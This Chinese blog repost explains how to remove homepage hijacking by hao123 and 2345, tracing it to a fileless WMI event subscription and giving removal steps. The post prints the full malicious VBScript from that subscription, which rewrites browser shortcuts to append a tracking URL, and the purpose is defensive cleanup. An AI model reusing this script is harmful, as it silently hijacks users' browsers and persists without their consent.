被hao123劫持主页最佳解决办法

摘要:
尝试了事件查看器和任务计划,但在其中找不到任何信息。之后,安装了超级兔子、360、灭绝特等工具进行检查,但没有被检测到。),按如下方式修改Win7下Opera快速启动图标的路径:C:UsersiefansAppDataRoamingMicrosoft Internet Explorer QuickLaunchUserPinnedTaskBarOpera12.011532.lnk查找数据,发现这应该是通过WMI启动的计划自动运行脚本。要查看WMI事件,请在以下地址下载并安装WMIToolhttp://www.microsoft.com/en-us/download/details.aspx?隐藏足够深,没有常驻进程,没有文件。
作者:田无法
链接:https://www.zhihu.com/question/39881858/answer/159582643
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

被hao123劫持主页最佳解决办法


方法一

下载360卫士,然后使用其主页劫持工具,可以恢复,但是还没结束,如果这是你高高兴兴地删除360,等第二次打开电脑时,又会出现主页被可恶的123hao劫持的情况,彻底解决问题的办法是,在C:WindowsSystem32wbemscrcons.exe这个文件中,找到删除scrcons.exe这个文件,他才是罪大恶极的祸端,然后你会发现删除不了,这是还是我们伟大的360卫士来帮忙,打开360卫士的文件粉碎机,把找到的scrcons.exe直接拖进去,OK,123hao劫持主页完美解决,可以感谢并删除360卫士了

方法二

考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。 之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。 打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了…),修改Win7下opera快速启动图标路径类似如下: C:UsersiefansAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBarOpera12.01 1532.lnk 查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装http://www.microsoft.com/en-us/download/details.aspx?id=24045 安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“rootsubscription”,确定,出现下图: 点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图: 查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。 受到影响的浏览器有(各色浏览器,差不多齐了): "IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe" 具体代码如下:On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:UsersGeminiDesktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:UsersGeminiAppDataRoamingMicrosoftInternet ExplorerQuick Launch":UserPinnedStartMenu = QuickLaunch & "User PinnedStartMenu":UserPinnedTaskBar = QuickLaunch & "User PinnedTaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If 最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除! 删不掉? 到WMITool安装路径(例如:C:Program Files (x86)WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之! 还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉! 暂时就这么多了,还有没有其它影响的话,用用再看吧! 解决方法来自:Gemini 希望大家能够把这解决方法普及开来,现在大多人还是用修改快捷方式之类的解决方案,已经落伍了... 原文出处: http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown

主页被劫持的情况经常出现,有的是装了流氓软件被改主页,有的是用windows激活软件等被改主页,收集了几个解决办法:

1、检查chrome和IE等图标,右键属性-快捷方式- 目标 如果是这样的“C:Program Files (x86)GoogleChromeApplicationchrome.exe” www.hao123.com 把后面的删除就可以了

2、看下目录下的chrome是否启动方式后缀名加了hao123 Start Menu下的 C:ProgramDataMicrosoftWindowsStart MenuPrograms

3、任务栏下的图标,有一次发现就是任务栏下的被改了 ,目录如下 
C:Users你的电脑名AppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar 
右键查看属性,若目标后面有hao123删了就行了

4、运行msconfig,找到系统自启动项,禁用陌生的自启动项。都陌生的,请禁用全部自启动项,如果解决了再一次解禁一部分自启动项来定位有问题的自启动项。

5、运行taskschd.msc打开任务计划程序,定位问题方法同上。

今天研究(翻,墙),装了几个插件,什么云帆、外遇、蓝灯

后来我的google浏览器被hao123劫持,百度浏览器被hao524劫持

删除浏览器快捷方式、属性目标里的后缀,过不多久又被劫持,把我搞毛了

弄了一晚上,发现是wmi脚本被篡改,写入了恶意代码

解决办法:

1、修改快捷方式、在快捷方式上右击属性对话框手工删除网址的部分

2、加载了启动项的,在注册表、启动项、服务中搜索相关网址信息,找到后删除

3、使用wmitools工具删除wmi恶意代码

wmitools下载地址:https://pan.baidu.com/s/1bo7GQvH

修改步骤如下:

① 安装wmitools后,进入安装路径,右键管理员运行wbemeventviewer.exe

                         被hao123劫持主页最佳解决办法第1张

 ②单击左上角的钢笔符号

                            被hao123劫持主页最佳解决办法第2张

③弹出对话框内容默认为:rootCIMV2 ,点击ok按钮

                            被hao123劫持主页最佳解决办法第3张

④接下来弹出的对话框再次点击ok按钮:

                            被hao123劫持主页最佳解决办法第4张

⑤窗口中出现_EventFilter,操作如下:

                          被hao123劫持主页最佳解决办法第5张

⑥恶意代码在下面的ScriptText里,我复制到notepad++里,如下:

                          被hao123劫持主页最佳解决办法第6张

   将上面代码复制到notepad++,如下:

                          被hao123劫持主页最佳解决办法第7张

⑦ 按如下操作,删除之:

                          被hao123劫持主页最佳解决办法第8张

⑧完成,关闭工具。

      注意:经排查,此问题是由于安装了蓝灯(翻,墙)插件,大家小心了

免责声明:文章转载自《被hao123劫持主页最佳解决办法》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇虹软ArcFace人脸识别 与 Dlib 人脸识别对比上位机开发之三菱Q系列PLC通信实践下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

ASP.NET CORE中使用Cookie身份认证

大家在使用ASP.NET的时候一定都用过FormsAuthentication做登录用户的身份认证,FormsAuthentication的核心就是Cookie,ASP.NET会将用户名存储在Cookie中。 现在到了ASP.NET CORE的时代,但是ASP.NET CORE中没有FormsAuthentication这个东西,那么怎么做身份认证呢?答案...

实验五 团队作业1:软件研发团队组建与软件案例分析

项目 内容 课程班级博客链接 https://edu.cnblogs.com/campus/xbsf/nwnu2020SE 这个作业要求链接 https://www.cnblogs.com/nwnu-daizh/p/12709461.html 团队名称 秃头小宝贝 团队的课程学习目标 通过团队合作学习的方法,掌握团队开发的要点,理解团...

使用RUU实现HTC Sensation (G14) 重刷系统

这两天帮人重刷HTC Sensation (G14)的系统,当初他从Android 2.3.X升到4.0后,发现系统很不稳定,经常崩溃,速度慢,所以找我帮忙重刷回Android 2.3.X。从没用过Android手机的我,习惯了苹果傻瓜式的操作习惯,花了两天时间,才把手机刷回去,期间查了很多很多的网站,给手机刷了N遍,已经轻车熟路了,这两天不能白忙,赶紧总...

EVE-NG 社区懒人版

EVE-NG 社区懒人版 http://www.emulatedlab.com/forum.php?mod=viewthread&tid=489 基于EVE-NG-v2.0.3-110 社区版改动Cli User: root/eve Web User: admin/eve改动日志:1.新增备用账号test密码eve,用于出现bug,无法退出实验场景...

C#对config配置文件的管理

应用程序配置文件,对于asp.net是web.config,对于WINFORM程序是App.Config(ExeName.exe.config)。 配置文件,对于程序本身来说,就是基础和依据,其本质是一个xml文件,对于配置文件的操作,从.NET2.0开始,就非常方便了,提供了System[.Web].Configuration这个管理功能的NameSpa...

Mysql----mysql启动服务时提示"服务名无效"

1,首先说明一下我的环境,我刚开始是用的XAMPP这个集成的软件,里面安装了apache, mysql,tomcat这些软件,然后通过控制面板对其进行启动关闭的操作,这些操作很方便,但是我就用net start mysql,这时出现了“服务名无效” 问题原因:mysql服务没有安装。 解决办法: 在 mysql bin目录下 以管理员的权限 执行 mys...